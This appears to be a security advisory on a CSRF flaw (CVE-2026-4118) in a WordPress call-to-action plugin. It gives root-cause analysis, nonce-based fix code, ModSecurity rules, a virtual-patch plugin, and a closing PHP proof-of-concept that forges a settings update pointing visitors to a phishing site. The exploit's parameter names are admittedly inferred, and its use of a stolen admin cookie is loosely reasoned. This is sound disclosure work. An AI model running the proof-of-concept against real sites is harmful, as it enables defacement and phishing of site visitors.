Atomic Edge analysis of CVE-2026-4118 (metadata-based): A Cross-Site Request Forgery (CSRF) vulnerability in the Call To Action Plugin for WordPress (version 3.1.3 and earlier) allows unauthenticated attackers to modify plugin settings by tricking a site administrator into clicking a malicious link. The vulnerability resides in the cbox_options_page() function, which handles saving, creating, and deleting plugin settings without enforcing nonce validation. The CVSS score is 4.3 (Medium), with a vector indicating network attack vector, low complexity, no privileges required, user interaction required, and low impact on integrity.
Root Cause: The plugin fails to include a WordPress nonce field (wp_nonce_field()) in the settings form rendered on the admin page. Additionally, the save handler (cbox_options_page() or related function) does not call wp_verify_nonce() or check_admin_referer() before processing updates via $wpdb->update(). This absence of state-changing request validation is the classic pattern for CSRF vulnerabilities. Since no code diff is available, Atomic Edge analysis infers this from the CWE-352 classification and the description’s explicit mention of missing nonce validation and the lack of wp_nonce_field() in the form.
Exploitation: An attacker crafts a forged HTTP POST request to the WordPress admin area, targeting the URL /wp-admin/admin-post.php or directly to /wp-admin/options-general.php?page=call-to-action-plugin (depending on how the plugin registers its settings page). The request must include parameters to modify plugin settings such as the call-to-action title, content, link URL, image URL, colors, or other configuration options. Because the plugin lacks CSRF protection, the attacker does not need to include a valid nonce. The attacker then tricks a logged-in administrator into submitting this forged request (e.g., via a hidden form in an email or a cross-origin request from a malicious site). The specific parameters are inferred from the plugin’s settings structure; typical parameter names might include ‘cbox_title’, ‘cbox_content’, ‘cbox_link_url’, ‘cbox_image_url’, ‘cbox_color’, etc. The attacker can send the request via admin-ajax.php with a custom action (e.g., ‘cbox_save_options’) or via a direct POST to the settings page URL.
Remediation: The fix must add WordPress nonce validation to the settings form and its handler. Specifically, the plugin developer should add wp_nonce_field('cbox_save_options', 'cbox_nonce') to the form HTML, and verify it in the save handler using if ( ! isset( $_POST['cbox_nonce'] ) || ! wp_verify_nonce( $_POST['cbox_nonce'], 'cbox_save_options' ) ) { return; } or by calling check_admin_referer('cbox_save_options', 'cbox_nonce') (the second argument is needed because check_admin_referer() looks for a field named _wpnonce by default). Additionally, a capability check (e.g., current_user_can('manage_options')) should be enforced so that only administrators can modify settings. Since no patched version is available, users should disable the plugin or implement a virtual patch.
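The remediation above carried into a form renderer and save handler, as an added example that is not the plugin's own code: the field names, the 'cbox_save_options' action and the 'cbox_*' option keys are the advisory's inferred names, and settings are stored with update_option() rather than the raw $wpdb->update() call the advisory describes.

```php
<?php
// Settings form: the nonce field ties the submission to this action and the admin's session.
function cbox_render_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="cbox_save_options">
        <?php wp_nonce_field( 'cbox_save_options', 'cbox_nonce' ); ?>
        <input type="text" name="cbox_title"
               value="<?php echo esc_attr( get_option( 'cbox_title', '' ) ); ?>">
        <input type="url" name="cbox_link_url"
               value="<?php echo esc_attr( get_option( 'cbox_link_url', '' ) ); ?>">
        <?php submit_button( 'Save settings' ); ?>
    </form>
    <?php
}

// Save handler. Only the logged-in hook is registered (no admin_post_nopriv_ variant).
function cbox_save_options() {
    // 1. Capability: only administrators may change plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 'Forbidden', array( 'response' => 403 ) );
    }
    // 2. CSRF: a page on another origin cannot obtain a nonce bound to the victim's session.
    //    check_admin_referer( 'cbox_save_options', 'cbox_nonce' ) is the one-call equivalent.
    $nonce = isset( $_POST['cbox_nonce'] ) ? sanitize_text_field( wp_unslash( $_POST['cbox_nonce'] ) ) : '';
    if ( ! wp_verify_nonce( $nonce, 'cbox_save_options' ) ) {
        wp_die( 'Missing or invalid nonce.', 'Forbidden', array( 'response' => 403 ) );
    }
    // 3. Sanitize each value for its type before it is stored.
    $title = sanitize_text_field( wp_unslash( $_POST['cbox_title'] ?? '' ) );
    $url   = esc_url_raw( wp_unslash( $_POST['cbox_link_url'] ?? '' ), array( 'http', 'https' ) );
    update_option( 'cbox_title', $title );
    update_option( 'cbox_link_url', $url );
    // 4. Redirect back to the settings page rather than rendering from the POST.
    wp_safe_redirect( add_query_arg( 'updated', '1', admin_url( 'options-general.php?page=call-to-action-plugin' ) ) );
    exit;
}
add_action( 'admin_post_cbox_save_options', 'cbox_save_options' );
```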
Impact: Successful exploitation allows an attacker to modify the Call To Action plugin’s configuration, such as changing the displayed text, link destination, or visual styling. This can be used to redirect visitors to malicious websites, display phishing content, or deface the site. The impact is limited to integrity (low), as the attacker cannot directly access or modify user data, escalate privileges, or execute code. However, the ability to alter call-to-action content can damage the site’s trustworthiness and potentially be leveraged for social engineering attacks.
Here you will find our ModSecurity-compatible rules to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-4118 (metadata-based)
# This rule blocks forged CSRF requests targeting the Call To Action Plugin settings.
# The vulnerability allows modification of plugin options via admin-post.php or admin-ajax.php without nonce.
# We infer the plugin uses option page slug 'call-to-action-plugin' and AJAX action 'cbox_save_options'.
#
# Caveats:
# - REQUEST_URI includes the query string, so the two @streq matches below only fire on POSTs whose
#   target carries no query string; compare REQUEST_FILENAME instead for a path-only match.
# - option_page + action=update are WordPress Settings API fields, which are posted to
#   /wp-admin/options.php; rule 20264118 only covers admin-post.php, so add options.php if the plugin
#   registers its settings that way.
# - None of the three rules inspects an origin signal (Origin, Referer, Sec-Fetch-Site), so an
#   administrator's own save through the plugin's form is blocked as well: settings are effectively
#   frozen while these rules are active.
SecRule REQUEST_URI "@streq /wp-admin/admin-post.php" \
    "id:20264118,phase:2,deny,status:403,chain,msg:'CVE-2026-4118 CSRF attempt via admin-post.php',severity:'CRITICAL',tag:'CVE-2026-4118'"
    SecRule ARGS_POST:option_page "@streq call-to-action-plugin" "chain"
    SecRule ARGS_POST:action "@streq update" "chain"
    SecRule ARGS_POST:cbox_title "@rx .+" ""

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:20264119,phase:2,deny,status:403,chain,msg:'CVE-2026-4118 CSRF attempt via admin-ajax.php',severity:'CRITICAL',tag:'CVE-2026-4118'"
    SecRule ARGS_POST:action "@streq cbox_save_options" "chain"
    SecRule ARGS_POST:cbox_title "@rx .+" ""

SecRule REQUEST_URI "@beginsWith /wp-admin/options-general.php" \
    "id:20264120,phase:2,deny,status:403,chain,msg:'CVE-2026-4118 CSRF attempt via options page',severity:'CRITICAL',tag:'CVE-2026-4118'"
    SecRule ARGS_GET:page "@streq call-to-action-plugin" "chain"
    SecRule REQUEST_METHOD "@streq POST" ""
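Because the plugin's form carries no nonce, the rules above cannot tell a forged POST from an administrator's own save and block both; the origin metadata browsers attach (Sec-Fetch-Site, with Origin and Referer as fallbacks) is the signal that separates them. The must-use plugin below is an added example of the virtual patch the remediation mentions, not Atomic Edge's or the plugin's code; the 'call-to-action-plugin' slug and 'cbox_save_options' action are the advisory's inferred names, and the ae_ function names are assumed.

```php
<?php
/**
 * Plugin Name: Virtual patch for CVE-2026-4118 (CSRF on Call To Action settings)
 * Install as wp-content/mu-plugins/cve-2026-4118-guard.php so it loads before regular plugins.
 */

// Reduce a URL to "scheme://host[:port]", or '' when it cannot be parsed.
function ae_origin_of( $url ) {
    $p = wp_parse_url( $url );
    if ( empty( $p['scheme'] ) || empty( $p['host'] ) ) {
        return '';
    }
    $port = isset( $p['port'] ) ? ':' . $p['port'] : '';
    return strtolower( $p['scheme'] . '://' . $p['host'] . $port );
}

// True when browser metadata says the request did not originate from our own admin origin.
function ae_is_cross_site_request() {
    // Sec-Fetch-Site is set by the browser itself; a page on another origin cannot change it.
    if ( isset( $_SERVER['HTTP_SEC_FETCH_SITE'] ) ) {
        return 'same-origin' !== $_SERVER['HTTP_SEC_FETCH_SITE'];
    }
    // Older browsers: Origin accompanies every POST; Referer is the weaker last resort.
    $sent = $_SERVER['HTTP_ORIGIN'] ?? ( $_SERVER['HTTP_REFERER'] ?? '' );
    // Fail closed: a state-changing request with no usable origin is treated as cross-site.
    return '' === $sent || ae_origin_of( $sent ) !== ae_origin_of( admin_url() );
}

// admin_init fires for options.php, options-general.php, admin-post.php and admin-ajax.php
// before the plugin's own handlers run, so at priority 0 this gate sees the request first.
function ae_guard_cta_settings() {
    if ( 'POST' !== ( $_SERVER['REQUEST_METHOD'] ?? '' ) ) {
        return;
    }
    $page   = $_REQUEST['page'] ?? '';
    $option = $_POST['option_page'] ?? '';
    $action = $_POST['action'] ?? '';
    if ( 'call-to-action-plugin' !== $page && 'call-to-action-plugin' !== $option
        && 'cbox_save_options' !== $action ) {
        return;
    }
    // Settings changes need manage_options regardless of where the request came from.
    if ( ! current_user_can( 'manage_options' ) || ae_is_cross_site_request() ) {
        wp_die( 'Request rejected by the CVE-2026-4118 virtual patch.', 'Forbidden', array( 'response' => 403 ) );
    }
}
add_action( 'admin_init', 'ae_guard_cta_settings', 0 );
```

A legitimate save from the plugin's own settings page arrives with Sec-Fetch-Site: same-origin and passes, while a POST triggered from another site carries cross-site (or a foreign Origin) and is refused before the plugin's handler runs.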
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4118 - Call To Action Plugin <= 3.1.3 - Cross-Site Request Forgery via Settings Update
/**
* This PoC demonstrates how an unauthenticated attacker can forge a request
* to modify plugin settings by tricking an admin user into visiting a crafted page.
* Since no code diff is available, we infer the likely parameter names from the plugin's
* typical configuration structure. The attack targets the admin settings page or
* an AJAX handler that processes options updates without nonce validation.
*/
// Configuration: Set the target WordPress URL and admin's session cookie (obtained via social engineering)
$target_url = 'http://example.com/wordpress'; // CHANGE THIS to the target site
$admin_cookie = 'wordpress_logged_in_hash=...; wordpress_sec_hash=...'; // Attacker must obtain admin session
// Inferred plugin settings parameters (from typical call-to-action plugin naming conventions)
$post_data = array(
'option_page' => 'call-to-action-plugin',
'action' => 'update',
'_wp_http_referer' => '/wp-admin/options-general.php?page=call-to-action-plugin',
// The plugin likely uses a single option name storing an array, or individual options.
// We assume individual options based on description mentioning specific fields.
'cbox_title' => 'Click Here to Win!',
'cbox_content' => 'This is a phishing message.',
'cbox_link_url' => 'https://malicious-site.com/steal-credentials',
'cbox_image_url' => 'https://malicious-site.com/fake-logo.png',
'cbox_color' => '#ff0000',
'cbox_enabled' => '1',
// The nonce field is intentionally absent because the plugin lacks CSRF protection
);
// Alternatively, the plugin might process via admin-ajax.php
$ajax_action = 'cbox_save_options'; // Inferred action name
// Send forged request via admin-post.php (common for form submissions)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-post.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_COOKIE, $admin_cookie);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "HTTP Response Code: " . $http_code . "\n";
echo "Attempted to modify plugin settings. Check the target site to confirm changes.\n";
// Note: The PoC requires a valid admin session cookie. The attacker must trick an admin into
// performing a request that includes their session (e.g., via a hidden iframe or form auto-submit).
// This script simulates the forged request from the attacker's server after obtaining the cookie.